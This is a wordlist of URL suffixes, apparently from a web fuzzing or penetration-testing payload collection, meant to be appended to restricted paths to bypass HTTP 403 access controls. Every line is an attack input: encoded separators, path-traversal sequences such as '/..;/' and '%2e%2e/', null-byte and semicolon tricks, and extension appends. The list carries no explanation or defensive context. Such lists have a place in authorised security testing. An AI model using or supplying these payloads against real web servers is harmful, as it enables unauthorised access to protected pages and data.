# 403 Bypass URL Payloads - Append to restricted paths
#
%09
%09%3b
%09..
%09;
%20
%23
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f/
%2f;?
%2f?;
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e.
%3b%2f..
%3b/%2e.
%3b/..
%3f%23
%3f%3f
%3f.php
..
..%00/
..%09
..%0d/
..%5c/
..%ff/
../
..;/
..\
.html
.json
/
/#
/%20
/%20#
/%23
/%252e%252e%252f/
/%2e%2e
/%2e%2e/
/%2f
/%3b/
/..
/..%2f
/../
/../../
/../../../
/../..;/
/.././../
/../.;/../
/..//
/../;/
/..;/
/..;/../
/..;/..;/
/..;//
/./
/.//
/.;/
//
//..
//../../
//..;
//./
//.;/
///..
///../
///..;
///..;/
//;/
/;/
/;//
/;?
/;x
/;x/
/?
/?;
/x/../
/x/..;/
/x//../
;
;%09
;%09..
;%2F..
;%2f..
;/%2e.
;/..
;/../
;/..;
?
?#
?.php
?;
??
///
/%2f/
//%2f
%2f/%2f
%2f%2f%2f
%2f//
